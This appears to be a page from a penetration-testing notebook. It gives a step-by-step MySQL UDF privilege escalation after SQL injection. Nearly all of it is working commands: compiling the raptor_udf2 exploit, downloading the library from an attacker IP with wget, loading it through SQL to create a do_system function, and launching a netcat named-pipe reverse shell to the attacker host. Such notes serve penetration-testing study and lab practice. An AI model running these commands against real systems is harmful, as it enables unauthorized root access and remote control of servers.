Privilege escalation using MySQL & SQLi

We learned that SQLi is working and we got the initial shell using SQLi.

let's check the version of MySQL first.

mysql --version

Trying UDF library exploit.

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)Exploit Database

Compile the exploit in Kali Linux.

searchsploit -m 1518
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so 1518.o -lc

We transfer the raptor_udf2.so to our victim machine into the tmp folder using wget.

# Make sure server is running at port 80.
wget http://192.168.45.242/raptor_udf2.so

then we do the following query to insert raptor_udf2.so and create a function allowing us to run commands.

SQL

create table foo(line blob); insert into foo values(load_file('/tmp/raptor_udf2.so')); 
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; 
create function do_system returns integer soname 'raptor_udf2.so';

Make a .sh file in /tmp directory using initial shell.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.242 80 >/tmp/f" >> shell.sh

Start listener at port 80.

sudo rlwrap nc -lnvp 80

Now I will run the shell.sh file though SQLi.

select do_system('/bin/bash /tmp/shell.sh');

PreviousLinux Privilege Escalation NextPort Redirection and SSH Tunneling

Last updated 1 year ago